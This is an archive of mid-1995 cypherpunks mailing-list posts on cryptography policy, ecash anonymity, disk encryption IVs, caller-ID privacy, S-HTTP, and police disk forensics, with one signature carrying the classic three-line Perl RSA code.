1998 (the year DES's certification expires) could be prohibitively costly
due to the high level of electronic funds transfers secured by DES.  ABA
therefore encouraged the National Institute for Standards and Technology
(NIST) to continue to endorse DES as a Federal Information Processing
Standard (FIPS) for use by the financial community.
	There has been an ongoing debate regarding who should control the
development and support of private-sector computer security standards:  the
government or the private sector.  ABA strongly recommends that the U.S.
government work with the private sector and Congress in an open forum to
develop a comprehensive policy on the commercial use of cryptography. 
	In its newly-revised policy statement on cryptography, ABA proposed
alternatives 
to DES and outlined other criteria that must be met before changes in
cryptographic 
standards can be accepted by the banking industry.   These criteria -- which
will be 
(more) 

ABA CRYPTOGRAPHY POLICY/P2
presented next week to representatives of the White House, U.S. Department
of Commerce, National Security Agency (NSA) and federal banking agencies --
were developed following a two-day meeting held in June of bankers, vendors
and crypto experts concerned about the federal government's direction
regarding private-sector information security. 
	Specifically, ABA recommended:
	a  The financial services industry be allowed to continue to use DES based
on risk 	assessment (e.g. value of the transaction) and the business
application involved. 
	a  A security framework encompassing a family of commercially available
algorithms, including DES, be developed.  This framework should include a
process for negotiated algorithm selection based on the level of risk and
other 	business requirements.  
	a Opposition to government mandated key management systems for financial
applications where keys would have to be stored outside the financial
institution 	(e.g. key registration/surrender or the mandatory escrow of
cryptographic keys).  	Instead, banks should continue to be responsible for
key management and 	continue to cooperate with government for law
enforcement purposes, as required 	by law.
 	a Export of cryptography for financial applications must not be restricted.
	a Full participation of Congress and the private sector before establishing
a U.S. 	policy for the commercial use of cryptography, instead of being
carried out solely 	by Executive Order.
	[Note:  These recommendations were summarized.  For the full statement,
please 	call Sonia Barbara at 202/663-5469.]
	The American Bankers Association is the only national trade and
professional association serving the entire banking community, from small
community banks to large bank holding companies.  ABA members represent
approximately 90 percent of the commercial banking industry's total assets,
and about 94 percent of ABA members are community banks with assets less
than $500 million.
###
--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Date: Wed, 26 Jul 95 17:20:41 PDT
To: cypherpunks@toad.com
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of
Message-ID: <m0sbGYf-000BHwC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


In the book I mentioned there is a quotation of D. Kahn, The
Codebreakers, from 1967:

"Interestingly, some pads seem to be produced by typists and not by
machines. They show strike-overs and erasures - neither likely to be
made by machines. More significant are analsyses of the digits.
One such pad, for example, has seven times as many groups in which
digits in the 1-to-5 group alternate with digits in the 6-to-0
group, like 18293, as a purely random arrangement would have.
This suggests that the typist is striking alternately with her
left hand (which would type the 1-to-5 group on a Continental
machine) and her right hand (which would type the 6-to-0 group).
Again, instead of just half the groups beginning with a low number,
which would be expected in a random selection, three quarters of
them do, possibly because the typist is spacing with her right
hand, then starting a new group with her left. Fewer doubles and
triples appear than chance expects. Possible the girls, ordered
to type at random, sensed that some doublets and triplets would
occur in a random text but, misled by their conspiciousness,
minimized them. Despite these anomalies, however, the digits
still show far too little pattern to make cryptanalysis possible."

-- 
Ulf Mller * um@ulf.mali.sub.org * 3umoelle@informatik.uni-hamburg.de
PGP key fingerprint: B6 4F 97 28 8F C0 54 C3  A6 10 02 2F B9 31 78 14 
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 27 Jul 95 05:03:21 PDT
To: "Robert A. Rosenberg" <KDAGUIO@aba.com
Subject: Re: Banks and Crypto
Message-ID: <v02120d02ac3d2f550d50@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 7/26/95, Robert A. Rosenberg wrote:
>At 13:25 7/26/95, KDAGUIO@aba.com wrote:
>>See attached file: F:\OFFILES\KODMAIL.MSG

>Is there ANY reason why you did not just paste the text of this file into
>your message?

Cluelessness? Carelessness? Some version of "-lessness", I'm sure...

>Also, if you are going to attach files in lieu of writing
>messages, it might be useful to mention what Wordprocessor was used to
>create the file so it can be read. In this case, what format is your file
>in?

I just used a special feature on my Mac to deal with it. It's called a
"trash can".

Please remember that almost all such attachments, unless identified (even
if identified, actually) usually get deleted.

To paraphrase The Immortal: "ASCII R00lz!"

Cheers,
Bob Hettinga






-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Thu, 27 Jul 95 06:30:03 PDT
To: cypherpunks@toad.com
Subject: Crypto: ride from SF on Saturday
Message-ID: <199507271329.IAA10651@icicle>
MIME-Version: 1.0
Content-Type: text


Is anyone driving from the SF area to Crypto (in Santa Barbara) on Saturday?
If so, I would like a ride.

Bruce

**************************************************************************
* Bruce Schneier
* Counterpane Systems         For a good prime, call 391581 * 2^216193 - 1
* schneier@counterpane.com
**************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Thu, 27 Jul 95 09:06:49 PDT
To: Andy Brown <asb@nexor.co.uk>
Subject: Re: Encrypting block driver for Linux...need some advice
In-Reply-To: <Pine.SOL.3.91.950727104038.17605B-100000@eagle.nexor.co.uk>
Message-ID: <Pine.LNX.3.91.950727085755.104A-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 27 Jul 1995, Andy Brown wrote:

> Your scheme should be OK.  If you'd chosen the same IV for each sector 
> then identical sectors would encrypt the same.  If I remember rightly 
> then having a known IV only affects the security of the first block, 
> after that the ciphertext chaining comes into effect.

I suspected as much.  I don't see how a known IV affects the security of the
first block even (and perhaps I'm exposing some real crypto-ignorance here
:).

Someone pointed out in private mail that the SFS docs have a good section on
IV selection techniques...I'll go off and read those.

==
Johnathan Corgan       "For the first time in history, it is possible to
jcorgan@aeinet.com      have absolute privacy over arbitrary distances."
PGP Key Fingerprint:    4F 28 69 B8 76 2E 42 3E  8B 4C 12 BB 3A 43 D4 07


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEUAwUBMBfGZelPfVlQ1n99AQFcswf470WxqWkne0OPdCeKcc8Gaei7AIeKUg//
CzrgD6ATPLrpMZcmNCMtv0cY4jo3tUnbJI50plyuda8v8Hlyc5l1ejSO0YoOBZrs
ICFhQfXp6bpPxV8ZFKozKo1N3RlcpgtArMZqoKZ4jfg3kMCTtBU2bc7Kh793sk3d
EXS2GcPpXYUiTMJ53IJyBXcl2KX1MnCUkWVeal8D9kGY4/8pfJFLWuqBpsUDCQsW
yamvhcDiltCD6ukRwQ7Vpu3dWCn0ZxjWg0emg/toqNNdKB950Bh+dlgd5z/LabTn
4eSPdqeWQW/W96cShm1y73AbGM8hJWWAuMKrFuaoyR1ilIis03eT
=sheZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Thu, 27 Jul 95 09:20:10 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Encrypting block driver for Linux...need some advice
In-Reply-To: <199507261756.UAA13722@shadows.cs.hut.fi>
Message-ID: <Pine.LNX.3.91.950727090405.104B-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 26 Jul 1995, Tatu Ylonen wrote:

> How about using the md5 hash of the block number combined with some
> secret data; e.g, the md5 hash of the passphrase reversed (I would not
> want to use the password directly, as that might help in breaking the
> key; on the other hand, md5 of block number alone is not good because
> there is a very limited number of blocks (and the attacker knows which
> block is being attacked)).

I guess my question is how does knowing the IV affect the security of CBC? 
I assumed that it only needed to be different for each block so that
identical plaintext encrypts to different ciphertext for different blocks.

> You might also want to support other algorithms, particularly IDEA
> (but beware, IDEA is patented and causes problems for commercial use -
> non-commercial use should be free).  Another algorithm to support
> might be Blowfish.

Yes, I plan on it.  Originally, I just grabbed RSAREF for a quick and dirty
drop in.

> Could you describe the implementation a little?  Does it use the nfs
> interface, or is it somewhere in the kernel file system code?  Or
> kernel block device code?  (User-level NFS servers may involve
> difficult security issues)

The software is a block device driver.  To use it, a user will run an
executable that will pass a filespec and key to the driver.  The driver then
translates calls to its block interface into calls to lseek/read/write on
the underlying inode.  Data is d(e)ncrypted on the fly during this process.

The user can then do anything you would normally do with a block
device--make a file system on it, tar files to it, use it for swap.  If the
provided filespec is actually located remotely, and is accessed via NFS,
SMB, or some other network protocol, then the benefit is that only
ciphertext is passed on the wire.

I'm stuck on figuring the the proper permissions for the device special
file, the attachment executable, and how to deal with one user attaching the
filespec to the driver, but allowing some predefined user list have access. 
All potential users of the driver need to have rw permission to it, but in
practice, the kernel module should only honor block read/write calls make by
authorized user processes.

I guess I need to step back and look a what types of threat models I should
address, and go from there.  That, and get a good book on Unix security :)

==
Johnathan Corgan       "For the first time in history, it is possible to
jcorgan@aeinet.com      have absolute privacy over arbitrary distances."
PGP Key Fingerprint:    4F 28 69 B8 76 2E 42 3E  8B 4C 12 BB 3A 43 D4 07


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMBfKaelPfVlQ1n99AQF7+gf+I+BV1EVPQhrT7FEygT7f8PC29kZuSseU
/qDlVbBrwHfzXOMgEBEkG214p9Xv1cPFQ+IlGglo321/92pxZdModA45oM3cG1ic
hv8oZ+KWIL6twhKX7M3aw5tYOBTTGcdyNqEosnntE1/eAnSEPaQgt8VLyoNBjSFN
64FZvTtR7G8O2HL26SYS1PzhEl3aPRdKv3Qw+kgu1xW+VLC5DcJs34/f1Nta6xBu
gFH9mfZZg4Y4VAMMyvQN+JAm7EmmIiCWAypqnwUt0SCgnpYub2EOfoKQOJ7e5hl5
9qcaLzeJsHpLGybcfT6cSEKjJ+b9MdTXrHQRPPdr2ZehcmyVSSLA7A==
=G47N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 27 Jul 95 09:38:18 PDT
To: mark@unicorn.com
Subject: Re: Full text of David Chaum's Congressional speech
Message-ID: <199507271636.JAA26799@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Rev. Mark Grant" <mark@unicorn.com>
> Now, I'm not sure of this, but as far as I can see, if I was a 
> blackmailer wanting to receive an untraceable payment I could do the 
> following :
> 
> 	I create my ecash serial number/hash
> 	I blind it with a random number
> 	I send it to the payer
> 
> 	Payer blinds it again and sends it to the bank
> 	
> 	Bank signs it and returns it
> 
> 	Payer removes their blinding and returns the result to me
> 
> 	I remove my blinding and send it to the bank for payment with
> 	no chance of being traced.
> 
> Will this work ?

I believe this will work, in most blinded-ecash systems.  Another way to
express it is you force the user to withdraw cash such that it comes into
your wallet.

There are some technical counter-measures though.  One is to have some
secure tamper-proof hardware which enforces certain kinds of ecash
transfers.  The above transfer would not be a legal one.  Only transfers
which would allow various forms of traceability would be allowed.

Another approach was described by Chaum in one of his papers.  I can't
remember the details, but basically the user had to go through a
preliminary transaction with the bank when he opened his account, to get
a whole lot of tokens which would later be turned into ecash.  He has to
get a lot of them because these will be for all the ecash he will use for
a whole decade (or whatever).  Then the withdrawal protocol is one which
turns a token into an ecash value.

The result of this approach is that the blinding is in effect fixed in
advance and there is no way to force different blinding under duress.  I
posted more detail on this to the list sometime last year but I don't
remember when unfortunately.

Note of course that this whole traceability business only works if you
have to identify yourself to the bank whenever you deposit the money.  If
someone allows anonymous banknote exchange then the whole "advantage"
goes out the window.  IMO payee anonymity will be a desired feature of
ecash systems and I think Chaum is making a mistake claiming that it will
not or should not exist.

Another quibble is that blackmail is not a good example.  The payor
doesn't want to blow the whistle on his blackmailer; the blackmailer is
doing the payor a favor by giving him the option of paying money rather
than having the damaging information revealed.  Often the payor will know
who the blackmailer is.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 27 Jul 95 06:50:36 PDT
To: cypherpunks@toad.com
Subject: Re: Full text of David Chaum's Congressional speech
In-Reply-To: <199507271307.PAA21979@digicash.com>
Message-ID: <9507271344.AA17685@all.net>
MIME-Version: 1.0
Content-Type: text


A few minor comments on David Chaum's testimony before congress:

...
> As an American who is regarded as the inventor of electronic cash,
> who has worked over the last dozen or so years to make the technology
> viable, and who is now CEO of a leading company pioneering in its
> commercialization, I am very pleased by the interest being shown
> here and to be here today. 

The inventor of electronic cash is Mr.  William S.  Powell, who holds
the patent on the electronic cashwatch and whose patent has been stomped
on by numerous and various others because he doesn't have the money to
defend it.  David Chaum's published work was more than 7 years later
than the issue date of the Powell patent.

...
> it will be the responsibility of government to protect against
> systemic risk.  This is a serious role that cannot be left to the
> micro-economic interests of commercial organizations.

David's technology notwithstanding, the only way the government can do
this is by eliminating the anonymity associated with cash in favor of a
fully audited system in which all of the transactions are known to the
government.  This is fundamentally at odds with the goal of privacy. 

> In order for those in government to make informed decisions, it will
> be necessary for them to understand the basic ways to secure
> transactions in different situations.

It is unlikely that their decisions will be based on their understanding
of technology - it better not be, since they don't understand it. 

> One basic form is tamper-resistance, exemplified by the chip in a
> chip card.  It is designed to be hard to modify or to read secrets
> from. Such tamper-resistance is needed for "off-line"
> payments--those in which the reader device receiving payment from a
> card, validates payments by contacting a central system only at the
> end of each day.

The current technology costs about $500 per chip-card to read and
recreate.  No current purely electronic technology is capable of being
used for a larger value than that under any scheme feasible for
electronic money.

> (Incidentally, this and the other basic form must rely for security
> on cryptography, sometimes refereed to as encryption, which is
> fundamental to all information security.) 

This is not true.  The vast majority of effective current technology in
information security is not tied to cryptography.

...

The testimony goes on and on, but I'll give up here for now.

---
-> See:  Info-Sec Heaven using our New Super Secure World-Wide-Web Server
-> Free: Test your system's security (scans deeper than SATAN or ISS!)
---------------------- both at URL: http://all.net ----------------------
-> Read: "Protection and Security on the Information Superhighway"
	 John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95
-------------------------------------------------------------------------
   Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Thu, 27 Jul 95 00:55:23 PDT
To: rross@sci.dixie.edu (Russell Ross)
Subject: Re: RC4
Message-ID: <9507270754.AA04474@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

>I wasn't aware that you could copyright an algorithm.  Patent, yes, but not
>copyright.  Intellectual property meens secret, right?  Aren't there any
>precendence cases involving propriety schemes that are reverse engineered?

Game cartridges (I think sega was involved)

  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 27 Jul 95 07:44:23 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Banks and Crypto
Message-ID: <199507271401.KAA10983@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 7/26/95 -0400, Robert A. Rosenberg wrote:

>Is there ANY reason why you did not just paste the text of this file into
>your message? Also, if you are going to attach files in lieu of writing
>messages, it might be useful to mention what word processor was used to
>create the file so it can be read. In this case, what format is your file
>in?

My copy of that inferior word processor Word for Windows 6.0 tells me it is
Wordperfect for DOS 5.1.


DCF

"The Market is X the Unknown, The Blob, and Blue Goo."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 27 Jul 95 07:17:23 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <ac3af6120f021004a990@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950727100633.28384B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jul 1995, Timothy C. May wrote:

> (Smileys for the :=)-impaired...I have nothing against Linux, and even
> browsed the new O'Reilly book recently. But I'm _still_ glad I'm "just a
> Mac user.")

Well you know there is a Mac version of Linux -- not sure if it's 
available for PPC yet.  there also is/was a version of FreeBSD a while 
back too.  (Don't know any details as I haven't done this myself yet.)

You could just add another hard drive and run Linux off of it, or install 
it on a SyQuest cartridge and set the startup disk to point to your 
SyQuest drive.  If you want Linux, start up with the cart.  If you don't, 
startup without it, or with the drive off.

Then you can have the best of both. >;-)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 27 Jul 95 07:25:26 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: CALLER ID AVOIDANCE (fwd)
Message-ID: <Pine.BSD/.3.91.950727101631.28384E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Tue, 25 Jul 1995 23:19:13 -0400
From: Sal Denaro <Sal@panix.com>
To: sunder@escape.com
Newgroups: alt.cypher-punks
Subject: Re: CALLER ID AVOIDANCE (fwd)

<<<<<< INTERJECTION: I didn't write the message Sal's replying to, Sandy 
did.  Sal's on my 'filtered' cypherpunx list. :-) -- Ray. >>>>>>>

In article <Pine.BSD/.3.91.950724140311.25983F-100000@escape.com>,
Ray Arachelian <sunder@escape.com> kept the nurses distracted long
  enough to write:
>                           SANDY SANDFORT
> C'punks,
> 
> While reading the July issue of Soldier of Fortune, I ran across
> an ad for yet another telephone anonymity service.  It reads:
> 
> 			CALL 1-900-CUT TRAX
>
> 	Secure your most sensitive calls from all forms of
> 	caller I.D. and return-call technologies?
> 
> 	Now make calls from your own telephone safely and
> 	anonymously.  No need to find a public phone to
> 	be discreet.
> 

If they are a Licensed Interchange Carrier they must (by law) provided
call records and caller id information on court order. If they fail to
answer the court order they could loose the right to operate as a LIC.
If they are not a fully licensed carrier, they can have all equipment 
impounded if they do not honor the court order. Ask anyone who knows 
telco-law. 

Let's say you call someone with call-id and do something silly like
tell them "I'm going to kill you and your boyfriend, leave my bloody
glove at the scene and drive away in my white ford bronco." 

This scares them. The person calls the cops. 

The cops call the number on caller id. They track down the service and
tell the service- "Give up the call records or get closed down."

What do you think the carrier will do?

I say this all the time, if you want privacy- Don't use the phone.

Here are some things I've heard: (Not responsible for blah blah...)

1) Most caller ID equipment will not display Caller ID from calls 
 made at IDSN phones. 

2) Most digital cell-phones have the same quirk.

3) Call-id does not work when calls are made from digital PBXs in 
 Japan.

4) Call-id does not work when calls are made from digital PBXs in most 
 parts of east-block Europe.

5) This happens only in Nynex land and will be fixed by 1997. (yes, 1997)

--
Salvatore Denaro		
sal@panix.com             I waited for the joke/It never did arrive.
Yes, I use PGP         Words I thought I'd choke/I hardly recognize.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joee@li.net (j. ercole)
Date: Thu, 27 Jul 95 07:26:09 PDT
To: cypherpunks@toad.com
Subject: mac share/freeware app for overwriting unused hd space?
Message-ID: <v01510100ac3d51f81e95@[199.173.75.102]>
MIME-Version: 1.0
Content-Type: text/plain


Can anyone point me towards a program that's freeware or shareware that
will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
sincerely apologise if this is a faq.  I know norton's will do it but I
don't presently have that installed on my machine.  Thanks oodles,
joe


j. ercole
ny, usa
vox: 516.681.3548
e-mail: joee@li.net
finger for pgp public key







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 27 Jul 95 02:44:49 PDT
To: cypherpunks@toad.com
Subject: Re: Encrypting block driver for Linux...need some advice
In-Reply-To: <Pine.LNX.3.91.950726091131.129A-100000@comet.aeinet.com>
Message-ID: <Pine.SOL.3.91.950727104038.17605B-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Johnathan Corgan wrote:
 
> Another, more crypto related question--how to deal with IV's?  Right now,
> I'm using 512 byte sectors with CBC.  For each sector, the IV is the
> sector number.  This frustrates the known plaintext attack issue, but I'm
> not sure if such a simple scheme is really effective.  Probably not.

Your scheme should be OK.  If you'd chosen the same IV for each sector 
then identical sectors would encrypt the same.  If I remember rightly 
then having a known IV only affects the security of the first block, 
after that the ciphertext chaining comes into effect.


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 27 Jul 95 07:48:03 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <Pine.BSD/.3.91.950727100633.28384B-100000@escape.com>
Message-ID: <9507271447.AA12988@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian writes:
> Well you know there is a Mac version of Linux -- not sure if it's 
> available for PPC yet.  there also is/was a version of FreeBSD a while 
> back too.  (Don't know any details as I haven't done this myself yet.)

NetBSD, not FreeBSD. There is also MachTen.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 27 Jul 95 07:56:13 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "Only on the Cypherpunks list..."
In-Reply-To: <9507271447.AA12988@snark.imsi.com>
Message-ID: <Pine.BSD/.3.91.950727104607.2847B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, Perry E. Metzger wrote:

> Ray Arachelian writes:
> > Well you know there is a Mac version of Linux -- not sure if it's 
> > available for PPC yet.  there also is/was a version of FreeBSD a while 
> > back too.  (Don't know any details as I haven't done this myself yet.)
> 
> NetBSD, not FreeBSD. There is also MachTen.

Thanks. :-)  MachTen though isn't freeware as Linux is. :-)  The problem 
I have with it is that it's a hosted OS and as such is limited to the 
Mac's problems.  i.e. - lack of true preemptive multi-tasking and 
protected memory.  Though the M680x0 series and all Mac motherboards can 
support both preemption and protected memory, Apple in its grand wisdom 
(or lack thereof?) is only now writing it into the next version of it's OS.

Other than that I love the Mac. :-)

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: E.J.Koops@kub.nl
Date: Thu, 27 Jul 95 01:50:57 PDT
To: cypherpunks@toad.com
Subject: Re: Utah Digital Signatures Act
Message-ID: <MAILQUEUE-101.950727105020.384@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


> From:          "greg pitz" <pitz@onetouch.com>
> Would someone be so kind as to describe the Utah initiative?  I
> wasn't able to find a further description in my percursory search of
> Mr Froomkin's otherwise very informative home page
>
> http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html

You can find the text at (save typing errors :-)):
gopher://gopher.utah.edu:70/77/Off%20Campus%20Information/State%20of%
20Utah/Utah%20Legislative%20Bills/1995/Bills/Senate/SB0082

Bert-Jaap

----------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 66 8101
Centre for Law and Informatization      facs    +31 13 66 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                               --------------------------------------
Postbus 90153                 |       "We forgot the crackers!"      |
5000 LE Tilburg               |                                      |
The Netherlands               |           Wallace and Gromit         |
---------------------------------------------------------------------
         http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Thu, 27 Jul 95 02:53:29 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge?
In-Reply-To: <9507262108.AA25550@toad.com>
Message-ID: <Pine.SOL.3.91.950727104855.17605C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Jul 1995, Peter Trei wrote:

> Where does the effort to bruteforce SSL stand?

[an addition to Piete's follow-up]

We should be ready to get going very soon.  Clients and servers are 
working together and just need a little more testing to make sure they 
are better than perfect :-)

The protocol we're going to use is designed to be highly general and can 
be used to attempt a brute force attack on any crypto algorithm.  More on 
this later, but we've had a few thoughts...


- Andy

+-------------------------------------------------------------------------+
| Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585    |
| PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88   |
+-------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 27 Jul 95 11:05:16 PDT
To: cypherpunks@toad.com
Subject: Allan Schiffman on SHTTP removing PGP support
Message-ID: <9507271805.AA27155@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I asked Allan, who spoke on S-HTTP at a recent BayFF meeting, about
this.

Date: Tue, 25 Jul 95 20:02:12 PDT
From: ams@eit.COM (Allan M Schiffman)

Its true, the most recent draft of the S-HTTP spec depreciated
(that is, dropped) support for PGP encapsulation.

Eric and I did this because we:
	1) Hadn't implemented PGP support ourselves.
	2) Knew of no other S-HTTP implementation which did (we know of
	   three other S-HTTP implementations).
	3) Were unsatisfied with the formalization of PGP encapsulation
	   format (as opposed to the behavior of a particular program).
	4) Realized that our spec didn't permit implementation given
	   our lack of support for PGP name forms and keying materials.
	   An alternative to dropping PGP would have been to fix this,
	   but we didn't have the time (or the motivation, given 1-3 above).

That doesn't mean "X.509 all the way" for S-HTTP, by a long shot. We
have publically committed (at the IETF WTS WG last week) to support
MOSS, with all its name forms and keying materials. The next draft of
the spec will detail how to do this, probably emphasizing the use of
new key management mechanisms made possible by Secure DNS.

For what its worth, I'm no fan of X.509, although I'm on record as a
believer in "multiply-rooted qualified hierarchical trust" (which
presumably classifies me as an "anal hierachy fan").

-Allan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Thu, 27 Jul 95 02:46:00 PDT
To: cypherpunks@toad.com
Subject: Police computer forensics interview
Message-ID: <199507270945.LAA08500@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


There is an article on page 122 of this weeks UK PC User (26 July - 22
August) by the head of the technical support unit for Essex Police.
Here's a few choice cuts from the article:

...

Now, what we do is go out on raids, or at least instruct officers on
how to seize computers and bring them back to the computer evidence
lab.  The first thing we do with a computer is to make an exact copy
of the hard disk and any floppies that come with it.  It is essential
that we have an exact image, rather than just a file copy, so we get
everything, like the remaining bits of deleted files.  We can
interrogate the free space and slack space where there could be
important evidence.

To do this we've developed our own imaging system.  This is basically
a bit copier:  it just copies every single bit of a hard disk onto
either an optical drive or a hard drive, and saves it as a long file.
We reconstruct the disk on our own computer, a Vale machine with a
90Mhz Pentium processor, and then we can perform the investigation.

...

What we look for depends on the case: if it's a fraudster's machine,
we'll be looking for sets of accounts, if we're dealing with a
paedophile, we're looking at graphic images.  We basically start by
looking for erased material, which is always the most interesting, and
the slack space.

...

